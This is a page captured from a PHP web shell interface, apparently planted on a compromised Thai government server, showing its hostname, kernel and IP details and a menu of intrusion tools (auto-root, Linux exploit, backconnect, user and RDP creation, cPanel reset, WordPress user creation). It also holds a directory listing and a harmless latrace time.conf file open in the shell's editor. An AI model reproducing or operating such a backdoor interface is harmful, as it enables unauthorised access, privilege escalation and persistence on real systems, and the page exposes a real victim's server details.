Linux ns8.secondary29.go.th 2.6.32-754.28.1.el6.x86_64 #1 SMP Wed Mar 11 18:38:45 UTC 2020 x86_64
Apache/2.2.15 (CentOS)
: 122.154.134.11 | : 122.154.134.9
Cant Read [ /etc/named.conf ]
5.6.40
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
etc /
latrace.d /
[ HOME SHELL ]
Name
Size
Permission
Action
sysdeps
[ DIR ]
drwxr-xr-x
ctype.conf
392
B
-rw-r--r--
dirent.conf
825
B
-rw-r--r--
dlfcn.conf
417
B
-rw-r--r--
fcntl.conf
643
B
-rw-r--r--
getopt.conf
273
B
-rw-r--r--
inet.conf
655
B
-rw-r--r--
ioctl.conf
68
B
-rw-r--r--
libintl.conf
651
B
-rw-r--r--
libio.conf
646
B
-rw-r--r--
locale.conf
286
B
-rw-r--r--
misc.conf
292
B
-rw-r--r--
mman.conf
976
B
-rw-r--r--
ncurses.conf
10.77
KB
-rw-r--r--
netdb.conf
3.84
KB
-rw-r--r--
pthread.conf
7.51
KB
-rw-r--r--
pwd.conf
869
B
-rw-r--r--
resource.conf
2.24
KB
-rw-r--r--
signal.conf
2.56
KB
-rw-r--r--
socket.conf
3.29
KB
-rw-r--r--
stat.conf
1.6
KB
-rw-r--r--
stdio.conf
3.85
KB
-rw-r--r--
stdlib.conf
6.18
KB
-rw-r--r--
string.conf
2.77
KB
-rw-r--r--
syslog.conf
198
B
-rw-r--r--
term.conf
934
B
-rw-r--r--
termios.conf
671
B
-rw-r--r--
time.conf
1.6
KB
-rw-r--r--
typedefs.conf
472
B
-rw-r--r--
unistd.conf
4.3
KB
-rw-r--r--
utmp.conf
564
B
-rw-r--r--
wait.conf
419
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : time.conf
/* /usr/include/time.h */ typedef u_int time_t; typedef u_int clockid_t; typedef void tm; typedef void timespec; typedef void timer_t; typedef void itimerspec; time_t time(time_t *timer); double difftime(time_t time1, time_t time0); time_t mktime(tm *tp); size_t strftime(char *s, size_t maxsize, char *format, tm *tp); char* strptime(char *s, char *fmt, tm *tp); size_t strftime_l(char *s, size_t maxsize, char *format, tm *tp, __locale_t __loc); char* strptime_l(char *s, char *fmt, tm *tp, __locale_t __loc); tm* gmtime(time_t *timer); tm* localtime(time_t *timer); tm* gmtime_r(time_t *timer, tm *tp); tm* localtime_r(time_t *timer, tm *tp); char* asctime(tm *tp); char* ctime(time_t *timer); char* asctime_r(tm *tp, char *buf); char* ctime_r(time_t *timer, char *buf); void tzset(); int dysize(int year); int nanosleep(timespec *requested_time, timespec *remaining); int stime(time_t *when); time_t timegm(tm *tp); time_t timelocal(tm *tp); int clock_getres(clockid_t clock_id, timespec *res); int clock_gettime(clockid_t clock_id, timespec *tp); int clock_settime(clockid_t clock_id, timespec *tp); int clock_nanosleep(clockid_t clock_id, int flags, timespec *req, timespec *rem); int clock_getcpuclockid(pid_t pid, clockid_t *clock_id); int timer_create(clockid_t clock_id, void *evp, timer_t *timerid); int timer_delete(timer_t *timerid); int timer_settime(timer_t timerid, int flags, itimerspec *value, itimerspec *ovalue); int timer_gettime(timer_t timerid, itimerspec *value); int timer_getoverrun(timer_t timerid); tm* getdate(char *string); int getdate_r(char *string, tm *resbufp);
Close